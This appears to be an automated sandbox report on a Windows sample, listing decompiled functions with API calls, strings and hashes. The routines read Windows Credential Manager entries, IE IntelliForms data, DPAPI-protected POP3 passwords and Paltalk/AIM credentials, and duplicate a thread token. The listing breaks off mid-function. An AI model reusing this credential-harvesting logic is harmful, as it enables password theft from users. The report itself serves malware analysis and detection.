                                C-Code - Quality: 100%
                                			E00404109(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;
				struct HINSTANCE__** _t19;

				_t19 = __eax;
				E00404170(__eax);
				_t10 = LoadLibraryA("advapi32.dll");
				 *_t19 = _t10;
				if(_t10 != 0) {
					_t19[2] = GetProcAddress(_t10, "CredReadW");
					_t19[3] = GetProcAddress( *_t19, "CredFree");
					_t14 = GetProcAddress( *_t19, "CredEnumerateW");
					_t19[4] = _t14;
					if(_t19[2] == 0 || _t19[3] == 0 || _t14 == 0) {
						E00404170(_t19);
					} else {
						_t19[1] = 1;
					}
				}
				return _t19[1];
			}







                                0x0040410a
                                0x0040410c
                                0x00404116
                                0x0040411e
                                0x00404120
                                0x00404138
                                0x00404144
                                0x00404147
                                0x0040414d
                                0x00404151
                                0x00404166
                                0x0040415d
                                0x0040415d
                                0x0040415d
                                0x00404151
                                0x0040416f

                                APIs
                                  • Part of subcall function 00404170: FreeLibrary.KERNEL32(?,00404111,00000000,0040FFAB,75D6F420), ref: 00404177
                                • LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,75D6F420,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
                                • GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
                                • GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
                                • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$Library$FreeLoad
                                • String ID: CredEnumerateW$CredFree$CredReadW$advapi32.dll
                                • API String ID: 2449869053-331516685
                                • Opcode ID: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
                                • Instruction ID: 12efa8cab8f3f54fa256443a021a4d85af4a352dd089a4683602f903f3396d9b
                                • Opcode Fuzzy Hash: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
                                • Instruction Fuzzy Hash: E7F0FFB06087009AD770AF75DC09B97BAF4AFD8700B25883FE195A6690D77DE8C1CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040955A, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                Download Yara Rule
                                C-Code - Quality: 43%
                                			E0040955A(void* __eax, void* __eflags, signed int _a4, short _a8) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t96;
				signed int _t98;
				void* _t99;
				signed int _t104;
				signed short _t107;
				signed int _t110;
				intOrPtr _t114;
				signed int _t117;
				signed int _t119;
				signed short _t121;
				signed int _t122;
				signed int _t152;
				signed int _t156;
				signed int _t158;
				signed int _t161;
				signed int _t163;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t178;
				intOrPtr _t180;

				_t174 = __eflags;
				_t172 = __eax;
				E00409370(__eax);
				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
				_t122 = 5;
				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
				_t156 = 0x14;
				_t96 = _t122 * _t156;
				 *(_t172 + 0x1b0) = _t122;
				0x413d5c( ~(0 | _t174 > 0x00000000) | _t96);
				 *(_t172 + 0x1b4) = _t96;
				_t158 = 0x10;
				_t98 = _t122 * _t158;
				0x413d5c( ~(0 | _t174 > 0x00000000) | _t98);
				 *(_t172 + 0x34) = _t98;
				_v8 = 0x41b8d8;
				do {
					_t99 = _v8;
					_t168 =  *_t99;
					_v12 = _t168;
					_t169 = _t168 * 0x14;
					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
					_t104 = _v12 << 4;
					_v12 = _t104;
					memcpy( *(_t172 + 0x34) + _t104, _v8 + 0x14, 0x10);
					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
					_t173 = _t173 + 0x18;
					_v16 = _t107;
					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
					if((_t107 & 0xffff0000) == 0) {
						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E0040876F(_t107 & 0x0000ffff);
						_t121 = E0040876F(_v16 | 0x00010000);
						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
						_t122 = 5;
					}
					_v8 = _v8 + 0x24;
					_t178 = _v8 - 0x41b98c;
				} while (_t178 < 0);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
				_t161 = 4;
				_t110 = _t122 * _t161;
				 *(_t172 + 0x20) = _t122;
				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
				0x413d5c( ~(0 | _t178 > 0x00000000) | _t110);
				 *(_t172 + 0x24) = _t110;
				0x413d5c(0xc);
				_t170 = _t110;
				if(_t170 == 0) {
					_t170 = 0;
					__eflags = 0;
				} else {
					_t114 =  *((intOrPtr*)(_t172 + 0x48));
					_t180 = _t114;
					_a8 = _t114;
					if(_t180 == 0) {
						_a8 = 0x64;
					}
					 *((intOrPtr*)(_t170 + 8)) = _a4;
					_t163 = 4;
					_t117 = _t122 * _t163;
					 *(_t170 + 4) = _t122;
					0x413d5c( ~(0 | _t180 > 0x00000000) | _t117);
					_a4 = _a4 & 0x00000000;
					 *_t170 = _t117;
					do {
						_t152 = _a4;
						_t119 = _t152 << 2;
						_a4 = _a4 + 1;
						 *( *_t170 + _t119 + 2) = _t152;
						 *((short*)(_t119 +  *_t170)) = _a8;
					} while (_a4 < _t122);
				}
				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
				 *(_t172 + 0x1a0) = _t170;
				 *((intOrPtr*)(_t172 + 0x40)) = 1;
				 *((intOrPtr*)(_t172 + 0x198)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
				return E004094DA(_t172);
			}

































                                0x0040955a
                                0x00409563
                                0x00409565
                                0x0040956d
                                0x00409573
                                0x00409574
                                0x0040957e
                                0x00409581
                                0x00409586
                                0x00409591
                                0x00409596
                                0x004095a0
                                0x004095a3
                                0x004095ad
                                0x004095b4
                                0x004095b7
                                0x004095be
                                0x004095be
                                0x004095c1
                                0x004095c3
                                0x004095c6
                                0x004095d5
                                0x004095e9
                                0x004095ef
                                0x004095f2
                                0x004095fd
                                0x00409607
                                0x0040960f
                                0x00409612
                                0x00409616
                                0x0040962f
                                0x00409633
                                0x00409640
                                0x00409644
                                0x00409644
                                0x00409645
                                0x00409649
                                0x00409649
                                0x00409659
                                0x0040965d
                                0x00409664
                                0x00409667
                                0x0040966c
                                0x0040966f
                                0x0040967b
                                0x00409682
                                0x00409685
                                0x0040968a
                                0x00409690
                                0x004096ec
                                0x004096ec
                                0x00409692
                                0x00409692
                                0x00409695
                                0x00409697
                                0x0040969a
                                0x0040969c
                                0x0040969c
                                0x004096a6
                                0x004096ad
                                0x004096b0
                                0x004096b5
                                0x004096bd
                                0x004096c2
                                0x004096c7
                                0x004096c9
                                0x004096c9
                                0x004096d0
                                0x004096d3
                                0x004096d9
                                0x004096e4
                                0x004096e4
                                0x004096ea
                                0x004096ee
                                0x004096f8
                                0x00409700
                                0x00409703
                                0x00409709
                                0x0040970f
                                0x00409715
                                0x00409728

                                APIs
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040937C
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040938A
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040939B
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093B2
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093BB
                                • ??2@YAPAXI@Z.MSVCRT ref: 00409591
                                • ??2@YAPAXI@Z.MSVCRT ref: 004095AD
                                • memcpy.MSVCRT ref: 004095D5
                                • memcpy.MSVCRT ref: 004095F2
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040967B
                                • ??2@YAPAXI@Z.MSVCRT ref: 00409685
                                • ??2@YAPAXI@Z.MSVCRT ref: 004096BD
                                  • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,00000FFF,?), ref: 00408838
                                  • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                  • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                  • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                • String ID: $$d
                                • API String ID: 2915808112-2066904009
                                • Opcode ID: 83977fa4547c2105a15e70559c2e4334156e97c5c74def1868066ed2ae587b6c
                                • Instruction ID: c86123869de2e32e5bed1250838fccac9115591d6117e5efa9fb73667f4d6fb1
                                • Opcode Fuzzy Hash: 83977fa4547c2105a15e70559c2e4334156e97c5c74def1868066ed2ae587b6c
                                • Instruction Fuzzy Hash: D8514971A01704AFDB24DF29D582BAAB7F4FF48314F10852EE55ADB292DB74E9408F44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411356, Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004107B0,00000000,00000000), ref: 0041138D
                                • EnumProcessModules.PSAPI(00000000,?,00004000,004107B0,?,004107B0,00000000,00000000), ref: 004113AF
                                • memset.MSVCRT ref: 004113EA
                                • memset.MSVCRT ref: 004113FC
                                • GetModuleFileNameExA.PSAPI(00000000,?,?,00000104,00000000,00000104), ref: 00411429
                                  • Part of subcall function 00411172: _mbscpy.MSVCRT ref: 00411198
                                • GetModuleInformation.PSAPI(00000000,?,?,0000000C), ref: 0041144F
                                • memset.MSVCRT ref: 004114E3
                                • _mbscpy.MSVCRT ref: 00411508
                                • CloseHandle.KERNEL32(00000000,004107B0,?), ref: 00411552
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$ModuleProcess_mbscpy$CloseEnumFileHandleInformationModulesNameOpen
                                • String ID:
                                • API String ID: 3697563772-0
                                • Opcode ID: 745c210aaaa6b85eaae148b780003da6f3cf09640a074c35b8bdb1d56aff2f36
                                • Instruction ID: 2b4e81a65471dd6bda77e3e7a539d18b8ecf8660f8cea3ab0205070076e1852f
                                • Opcode Fuzzy Hash: 745c210aaaa6b85eaae148b780003da6f3cf09640a074c35b8bdb1d56aff2f36
                                • Instruction Fuzzy Hash: 5F511FB1D00218ABDF10DF95DC85ADEBBB9EF48704F0040A6E609A6251D7759FC0CF69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004134D0, Relevance: 13.6, APIs: 9, Instructions: 61windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetParent.USER32(00000000), ref: 004134D2
                                • GetWindowLongA.USER32(00000000,000000EC), ref: 004134E4
                                • GetWindowLongA.USER32(00000000,000000F0), ref: 004134EF
                                • GetClassNameA.USER32(00000000,?,000003FF), ref: 00413505
                                • GetWindowTextA.USER32(00000000,?,000003FF), ref: 00413511
                                • GetWindowRect.USER32(00000000,?), ref: 0041351F
                                • CopyRect.USER32(?,?), ref: 00413533
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00413541
                                • SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041359A
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Window$LongRect$ClassCopyMessageNameParentPointsSendText
                                • String ID:
                                • API String ID: 2317770421-0
                                • Opcode ID: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
                                • Instruction ID: beb27d93b7d0259d1707648e93b0cb5b486bd7e44cd55be4178ee0c76b875b45
                                • Opcode Fuzzy Hash: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
                                • Instruction Fuzzy Hash: BF21A6B5500B01EFD7609F75DC88AD7BBEDFB88700F00CA2DA5AAD2254DA306541CFA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041244B, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy
                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                • API String ID: 3510742995-3273207271
                                • Opcode ID: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
                                • Instruction ID: f5a03e54b86e24f841f817b97e8ec33e4e13f45a83786b80a5cfcbc9bb1d817d
                                • Opcode Fuzzy Hash: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
                                • Instruction Fuzzy Hash: 0401DFB2EC465475EB3201093E4AFE72A4447B7B21F660667F589A0285E0DD0EF381BF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410205, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 132COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004102AA
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,75D6F420,00000000), ref: 004102C3
                                • _strnicmp.MSVCRT ref: 004102DF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00418AE0,000000FF,?,000000FF,00000000,00000000,?,?,?,?,75D6F420,00000000), ref: 0041030D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,75D6F420,00000000), ref: 0041032C
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ByteCharMultiWide$_strnicmpmemset
                                • String ID: WindowsLive:name=*$windowslive:name=
                                • API String ID: 2393399448-3589380929
                                • Opcode ID: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
                                • Instruction ID: 25a7ce4e34514ebc1ab433be8417aa6076f8fd68c633d2ab3a6fecdf2bbac582
                                • Opcode Fuzzy Hash: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
                                • Instruction Fuzzy Hash: 59414DB190021EAFDB149F94DD849EEB7BCBF08304F1441AAE915A3251D774EEC4CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040821A, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 82%
                                			E0040821A(void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				intOrPtr _v32;
				void _v287;
				char _v288;
				void* __esi;
				void** _t43;
				intOrPtr _t80;
				void* _t84;
				void* _t85;
				void* _t86;

				_t80 = _a4;
				_v32 = _t80 + 0x24;
				E0040733E(_t80 + 0x24);
				_t43 =  &_v20;
				0x411d68(0x80000001, "Software\Microsoft\Internet Explorer\IntelliForms\Storage2", _t43);
				_t85 = _t84 + 0xc;
				if(_t43 == 0) {
					_v16 = 0;
					_v24 = _t80 + 0x64;
					E0040746B(_t80 + 0x64, 0x2000);
					_v28 = 0;
					_v12 = 0xff;
					_v8 = 0x2000;
					_v288 = 0;
					memset( &_v287, 0, 0xff);
					_t86 = _t85 + 0xc;
					if(RegEnumValueA(_v20, 0,  &_v288,  &_v12, 0,  &_v28, E004074AA(_v24),  &_v8) != 0) {
						L4:
						return RegCloseKey(_v20);
					}
					_a4 = _a4 + 0x44;
					do {
						0x413df2( &_v288);
						E00407364(_v32,  &_v288, 0xffffffff);
						E00407364(_a4, E004074AA(_v24), _v8);
						_v16 = _v16 + 1;
						_v28 = 0;
						_v12 = 0xff;
						_v8 = 0x2000;
						_v288 = 0;
						memset( &_v287, 0, 0xff);
						_t86 = _t86 + 0xc;
					} while (RegEnumValueA(_v20, _v16,  &_v288,  &_v12, 0,  &_v28, E004074AA(_v24),  &_v8) == 0);
					goto L4;
				}
				return _t43;
			}


















                                0x00408225
                                0x0040822b
                                0x0040822e
                                0x00408233
                                0x00408241
                                0x00408246
                                0x0040824b
                                0x0040825e
                                0x00408261
                                0x00408264
                                0x00408277
                                0x0040827a
                                0x0040827d
                                0x00408280
                                0x00408286
                                0x0040828b
                                0x004082b7
                                0x0040834c
                                0x00000000
                                0x00408355
                                0x004082c3
                                0x004082c6
                                0x004082cd
                                0x004082df
                                0x004082f3
                                0x004082f8
                                0x00408304
                                0x00408307
                                0x0040830a
                                0x0040830d
                                0x00408313
                                0x00408318
                                0x00408344
                                0x00000000
                                0x004082c6
                                0x00408359

                                APIs
                                  • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407341
                                  • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407349
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                  • Part of subcall function 0040746B: ??3@YAXPAX@Z.MSVCRT ref: 00407478
                                • memset.MSVCRT ref: 00408286
                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 004082AF
                                • _strupr.MSVCRT ref: 004082CD
                                  • Part of subcall function 00407364: strlen.MSVCRT ref: 00407375
                                  • Part of subcall function 00407364: ??3@YAXPAX@Z.MSVCRT ref: 00407398
                                  • Part of subcall function 00407364: ??3@YAXPAX@Z.MSVCRT ref: 004073BB
                                  • Part of subcall function 00407364: memcpy.MSVCRT ref: 004073DB
                                • memset.MSVCRT ref: 00408313
                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 0040833E
                                • RegCloseKey.ADVAPI32(?), ref: 0040834F
                                Strings
                                • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00408237
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@$EnumValuememset$CloseOpen_struprmemcpystrlen
                                • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                • API String ID: 373939914-680441574
                                • Opcode ID: 595d46858c789d7861cec1ba9a6a44fece00a80f0e7bf05d1a4c71afb02c0405
                                • Instruction ID: e14454ebfdff30ad66f99699cc9b695ae8a68f87cdcb03d8fe41683d15f76d0b
                                • Opcode Fuzzy Hash: 595d46858c789d7861cec1ba9a6a44fece00a80f0e7bf05d1a4c71afb02c0405
                                • Instruction Fuzzy Hash: 5141EDB2D0011DAFDB11DF99DC829DEBBBCAF14304F10406ABA05F2151E634AB45CB95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407A93, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 93registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 65%
                                			E00407A93(intOrPtr* _a4, void* _a8, intOrPtr _a12) {
				int _v12;
				int _v16;
				unsigned int _v20;
				int _v24;
				int _v28;
				char _v32;
				char* _v36;
				char _v40;
				char _v296;
				char _v552;
				char _v808;
				char _v1064;
				void _v2087;
				char _v2088;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t42;
				char* _t66;
				void* _t70;

				_v2088 = 0;
				memset( &_v2087, 0, 0x3ff);
				_v12 = 0x400;
				_v1064 = 0;
				_v808 = 0;
				_v552 = 0;
				_v296 = 0;
				_t42 = RegQueryValueExA(_a8, "POP3_credentials", 0,  &_v16,  &_v2088,  &_v12);
				_t74 = _t42;
				if(_t42 != 0) {
					return _t42;
				}
				_v32 = 0;
				_v24 = 0;
				_v28 = 0;
				if(E00404C9D( &_v32, _t74) != 0) {
					_v36 =  &_v2088;
					_v40 = _v12;
					if(E00404CF5( &_v32,  &_v40, 0,  &_v20) != 0) {
						 *((char*)(_t70 + WideCharToMultiByte(0, 0, _v16, _v20 >> 1,  &_v552, 0xfd, 0, 0) - 0x224)) = 0;
						LocalFree(_v16);
						0x411d82(_a8, "POP3_name");
						0x411d82(_a8, "POP3_host");
						_t66 =  &_v1064;
						E00406958(0xff, _t66, _a12);
						 *((intOrPtr*)( *_a4))(_t66);
					}
				}
				return E00404CE0( &_v32);
			}























                                0x00407aae
                                0x00407ab4
                                0x00407ad4
                                0x00407adb
                                0x00407ae1
                                0x00407ae7
                                0x00407aed
                                0x00407af3
                                0x00407af9
                                0x00407afb
                                0x00407bc3
                                0x00407bc3
                                0x00407b04
                                0x00407b07
                                0x00407b0a
                                0x00407b14
                                0x00407b20
                                0x00407b26
                                0x00407b3c
                                0x00407b60
                                0x00407b67
                                0x00407b82
                                0x00407b97
                                0x00407b9f
                                0x00407ba5
                                0x00407bb5
                                0x00407bb5
                                0x00407b3c
                                0x00000000

                                APIs
                                • memset.MSVCRT ref: 00407AB4
                                • RegQueryValueExA.ADVAPI32(?,POP3_credentials,00000000,?,?,?), ref: 00407AF3
                                  • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FD,00000000,00000000,?,00000000,?), ref: 00407B57
                                • LocalFree.KERNEL32(?), ref: 00407B67
                                  • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                  • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                  • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrlen
                                • String ID: POP3_credentials$POP3_host$POP3_name
                                • API String ID: 2752996003-2190619648
                                • Opcode ID: f9e0cc1d15b7ae483417ba89dbd2acaad5c80dd12f00609131e53948eb699b81
                                • Instruction ID: 3c80738b82331245788ee24e24f692cafec0a237d8f87c7d6b462bdafe46d179
                                • Opcode Fuzzy Hash: f9e0cc1d15b7ae483417ba89dbd2acaad5c80dd12f00609131e53948eb699b81
                                • Instruction Fuzzy Hash: 9F312DB190121DAFDB11DF99DD81AEEBBBCEF48304F4040AAE955B3251D634AF448BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410F07, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • memset.MSVCRT ref: 00410F48
                                  • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                • memset.MSVCRT ref: 00410F92
                                • RegCloseKey.ADVAPI32(?), ref: 00410FF6
                                • RegCloseKey.ADVAPI32(?), ref: 0041101F
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Closememset$EnumOpen
                                • String ID: Software\Paltalk$nickname$pwd
                                • API String ID: 1938129365-1014362899
                                • Opcode ID: 371f017254c023b24f35e6f21b54137d424e2b90dbe38bf80ef2b31f4a61ba7b
                                • Instruction ID: 96d414647358d9b2c810da9b3bce946d65dcecd18022e5434843d59e9988e6f9
                                • Opcode Fuzzy Hash: 371f017254c023b24f35e6f21b54137d424e2b90dbe38bf80ef2b31f4a61ba7b
                                • Instruction Fuzzy Hash: 7B3164B1D4011DAFDF11AB95DD42BEE7B7DAF18304F0000A6F604A2111D7399F95CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004044DE, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E004044DE(char _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				int _t17;
				_Unknown_base(*)()* _t19;
				void* _t20;
				_Unknown_base(*)()* _t22;
				void* _t24;
				void* _t25;
				void* _t27;
				void* _t33;

				_v8 = _v8 & 0x00000000;
				_t17 =  &_v8;
				0x410daa(0xffffffff, 0xe,  &_v16);
				if(_t17 == 0) {
					L10:
					if(_v8 == 0) {
						return _t17;
					}
					return FreeLibrary(_v8);
				}
				_t25 = _v16;
				0x410d8a(_t33, _t24);
				if(_t17 == 0) {
					L9:
					_t17 = CloseHandle(_v16);
					goto L10;
				}
				_t19 = GetProcAddress(_v8, "DuplicateToken");
				if(_t19 != 0) {
					_t20 =  *_t19(_t25, 2,  &_v12);
					if(_t20 != 0) {
						_t27 = _v12;
						0x410d8a();
						if(_t20 != 0) {
							_t22 = GetProcAddress(_v8, "SetThreadToken");
							if(_t22 != 0) {
								 *_t22( &_a4, _t27);
							}
						}
						CloseHandle(_v12);
					}
				}
				goto L9;
			}














                                0x004044e4
                                0x004044f0
                                0x004044f3
                                0x004044fa
                                0x00404565
                                0x00404569
                                0x00404575
                                0x00404575
                                0x00000000
                                0x0040456e
                                0x004044fd
                                0x00404504
                                0x0040450b
                                0x0040455a
                                0x0040455d
                                0x00000000
                                0x00404564
                                0x0040451c
                                0x00404520
                                0x00404529
                                0x0040452d
                                0x0040452f
                                0x00404532
                                0x00404539
                                0x00404543
                                0x00404547
                                0x0040454e
                                0x0040454e
                                0x00404547
                                0x00404553
                                0x00404553
                                0x0040452d
                                0x00000000

                                APIs
                                  • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0
                                • FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
                                  • Part of subcall function 00410D8A: LoadLibraryA.KERNEL32(advapi32.dll,00410DB5,00000000,00000000,004044F8,000000FF,0000000E,?,?,0040428D), ref: 00410D94
                                • GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
                                • GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
                                • CloseHandle.KERNEL32(?), ref: 00404553
                                • CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$CloseHandleLibrary$FreeLoad
                                • String ID: DuplicateToken$SetThreadToken
                                • API String ID: 3357505703-785560009
                                • Opcode ID: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
                                • Instruction ID: fb771c117c903999f7ab115302b4b85a9bfa7a6589c8aae05a31450a7ce75296
                                • Opcode Fuzzy Hash: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
                                • Instruction Fuzzy Hash: D4113071900109FBDB10E7A5DD55EEE7B78AF84340F144176A611B10E1EB74DF44DA68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408FBC, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37COMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E00408FBC(void* __eflags, intOrPtr _a4) {
				void* _t3;
				int _t4;
				void* _t10;
				void* _t13;

				_t3 = E004069D3(_a4);
				if(_t3 != 0) {
					0x413d0c(0x41e200, _a4, _t10, _t13);
					0x413d0c(0x41e308, "general");
					_t4 = GetPrivateProfileIntA(0x41e308, "rtl", 0, 0x41e200);
					asm("sbb eax, eax");
					 *0x41e34c =  ~(_t4 - 1) + 1;
					 *0x41e350 = 0;
					return GetPrivateProfileStringA(0x41e308, "charset", 0x417c88, 0x41e350, 0x3f, 0x41e200);
				}
				return _t3;
			}







                                0x00408fc0
                                0x00408fc8
                                0x00408fd6
                                0x00408fe6
